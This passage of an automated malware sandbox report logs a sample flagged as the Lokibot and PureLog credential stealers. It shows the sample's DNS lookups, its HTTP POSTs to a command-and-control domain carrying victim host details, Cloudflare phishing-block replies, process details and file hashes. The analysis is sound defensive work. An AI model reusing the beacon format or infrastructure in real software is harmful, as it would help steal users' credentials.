Dec 5, 2024 17:08:49.559864998 CET | 80 | 49707 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:49.559911013 CET | 49707 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:49.707811117 CET | 49708 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:49.827773094 CET | 80 | 49708 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:49.827872992 CET | 49708 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:49.830173969 CET | 49708 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:49.950922012 CET | 80 | 49708 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:49.951076031 CET | 49708 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:50.070925951 CET | 80 | 49708 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:50.948086023 CET | 80 | 49708 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:50.948291063 CET | 80 | 49708 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:50.948303938 CET | 80 | 49708 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:50.948313951 CET | 80 | 49708 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:50.948328972 CET | 80 | 49708 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:50.948359013 CET | 80 | 49708 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:50.948383093 CET | 49708 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:50.948414087 CET | 49708 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:50.948414087 CET | 49708 | 80 | 192.168.2.6 | 172.67.153.63
Dec 5, 2024 17:08:50.949445009 CET | 80 | 49708 | 172.67.153.63 | 192.168.2.6
Dec 5, 2024 17:08:50.949480057 CET | 49708 | 80 | 192.168.2.6 | 172.67.153.63
                              Dec 5, 2024 17:08:50.949480057 CET4970880192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:50.949491978 CET4970880192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:51.400041103 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:51.519943953 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:51.520034075 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:51.522492886 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:51.642457008 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:51.642512083 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:51.762314081 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.636341095 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.636395931 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.636409044 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.636440039 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.636451960 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.636476994 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:52.636507034 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:52.636595011 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:52.637334108 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.640974998 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:52.777381897 CET4971180192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:52.902117968 CET8049711172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.902193069 CET4971180192.168.2.6172.67.153.63
                              TimestampSource PortDest PortSource IPDest IP
                              Dec 5, 2024 17:08:47.831559896 CET5557953192.168.2.61.1.1.1
                              Dec 5, 2024 17:08:48.239825010 CET53555791.1.1.1192.168.2.6
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Dec 5, 2024 17:08:47.831559896 CET192.168.2.61.1.1.10xb0f6Standard query (0)dddotx.shopA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Dec 5, 2024 17:08:48.239825010 CET1.1.1.1192.168.2.60xb0f6No error (0)dddotx.shop172.67.153.63A (IP address)IN (0x0001)false
                              Dec 5, 2024 17:08:48.239825010 CET1.1.1.1192.168.2.60xb0f6No error (0)dddotx.shop104.21.12.202A (IP address)IN (0x0001)false
                              • dddotx.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49707 | 172.67.153.63 | 80 | 5748 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 17:08:48.492671967 CET | 240 | OUT | POST /Mine/PWS/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: dddotx.shop
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: 925F43C2
                              Content-Length: 188
                              Connection: close
Dec 5, 2024 17:08:48.612483978 CET | 188 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                              Data Ascii: 'ckav.ruengineer936905ENGINEER-PCk0FDD42EE188E931437F4FBE2CdEgPD
Dec 5, 2024 17:08:49.559437037 CET | 1236 | IN | HTTP/1.1 403 Forbidden
                              Date: Thu, 05 Dec 2024 16:08:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DC1Le%2BDiy2G%2FblVMQtNZTQZxkNLrvBkMzyrk8Lv0Hsn3oMUxWrZ4Fcu%2BnDXcVeRiDamqR%2F4%2FmiIDaL4ITK2m3nzrzAmdcLxkAJgDMm4sqsdbTQZLSnmy5ZYx6tKXtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ed54c0cac7c42de-EWR
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
Dec 5, 2024 17:08:49.559463978 CET | 1236 | IN | Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20
                              Data Ascii: s/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled
Dec 5, 2024 17:08:49.559474945 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 3c 70 3e 50 68 69 73 68 69 6e 67 20 69 73 20 77 68 65 6e 20 61 20 73 69 74 65 20 61 74 74 65 6d 70 74 73 20 74 6f 20 73 74 65 61 6c 20 73 65 6e 73 69 74 69 76 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 62 79 20 66 61 6c 73 65
                              Data Ascii: <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p>
Dec 5, 2024 17:08:49.559485912 CET | 1236 | IN | Data Raw: 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f
                              Data Ascii: -300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ed54c0cac7c42de</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-foo
Dec 5, 2024 17:08:49.559499025 CET | 145 | IN | Data Raw: 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20
                              Data Ascii: </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49708 | 172.67.153.63 | 80 | 5748 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 17:08:49.830173969 CET | 240 | OUT | POST /Mine/PWS/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: dddotx.shop
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: 925F43C2
                              Content-Length: 188
                              Connection: close
Dec 5, 2024 17:08:49.951076031 CET | 188 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                              Data Ascii: 'ckav.ruengineer936905ENGINEER-PC+0FDD42EE188E931437F4FBE2CiRSl9
Dec 5, 2024 17:08:50.948086023 CET | 1236 | IN | HTTP/1.1 403 Forbidden
                              Date: Thu, 05 Dec 2024 16:08:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E8KByjwPVRDzckWfwhsqzcyp8CStwlgUPhMUsP1S3SlyviMFU9tQIcsNRTL%2FS4L9%2B0ejmFMtsEWeuY%2BX3iLhq4qrQOQt3A0bgWRp8JG%2FK3lSw2oLkl5O%2B4VJ%2F6saMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ed54c15486c19bf-EWR
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/sty
Dec 5, 2024 17:08:50.948291063 CET | 224 | IN | Data Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73
                              Data Ascii: les/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!na
Dec 5, 2024 17:08:50.948303938 CET | 1236 | IN | Data Raw: 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20
                              Data Ascii: vigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) }</script>...<![endif]--></head><body>
Dec 5, 2024 17:08:50.948313951 CET | 224 | IN | Data Raw: 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e
                              Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a>
Dec 5, 2024 17:08:50.948328972 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63
                              Data Ascii: <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="M.xhfZTuO3PYE1QCnPWodopC3jrpyhA0QyF2ukfcA50-1733414930-0.0.1.1-/Mine/PWS/fre.php
Dec 5, 2024 17:08:50.948359013 CET | 935 | IN | Data Raw: 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72
                              Data Ascii: ="hidden" id="cf-footer-ip">8.46.123.228</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferre


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49710 | 172.67.153.63 | 80 | 5748 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 17:08:51.522492886 CET | 240 | OUT | POST /Mine/PWS/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: dddotx.shop
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: 925F43C2
                              Content-Length: 161
                              Connection: close
Dec 5, 2024 17:08:51.642512083 CET | 161 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                              Data Ascii: (ckav.ruengineer936905ENGINEER-PC0FDD42EE188E931437F4FBE2C
Dec 5, 2024 17:08:52.636341095 CET | 1236 | IN | HTTP/1.1 403 Forbidden
                              Date: Thu, 05 Dec 2024 16:08:52 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aXDuLr5yd7B6aJd%2BuLl5EwxNocMfvrsLYims54n29GsBiRzWxc57q5vMQwBjVHFP8jUmxGjuN3aExQLh%2BDMyjKIEyWoaaLe4nXcgSPWgJTFtHZOyufmUwCYBKXkrzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ed54c1fd95541e6-EWR
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.e
Dec 5, 2024 17:08:52.636395931 CET | 1236 | IN | Data Raw: 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22
                              Data Ascii: rrors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) {
Dec 5, 2024 17:08:52.636409044 CET | 1236 | IN | Data Raw: 20 3c 70 3e 50 68 69 73 68 69 6e 67 20 69 73 20 77 68 65 6e 20 61 20 73 69 74 65 20 61 74 74 65 6d 70 74 73 20 74 6f 20 73 74 65 61 6c 20 73 65 6e 73 69 74 69 76 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 62 79 20 66 61 6c 73 65 6c 79 20 70 72 65
                              Data Ascii: <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p>
Dec 5, 2024 17:08:52.636440039 CET | 1236 | IN | Data Raw: 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72
                              Data Ascii: <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ed54c1fd95541e6</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-it
Dec 5, 2024 17:08:52.636451960 CET | 139 | IN | Data Raw: 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f
                              Data Ascii: /div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>



Target ID: 0
Start time: 11:08:45
Start date: 05/12/2024
Path: C:\Users\user\Desktop\6SQADa3zKv.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\6SQADa3zKv.exe"
Imagebase: 0x410000
File size: 187'904 bytes
MD5 hash: D1D899B06642500D72ACAEB42896B348
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2119213083.0000000000412000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 1
Start time: 11:08:45
Start date: 05/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase: 0x3e0000
File size: 56'368 bytes
MD5 hash: FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 2
Start time: 11:08:45
Start date: 05/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase: 0x940000
File size: 56'368 bytes
MD5 hash: FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
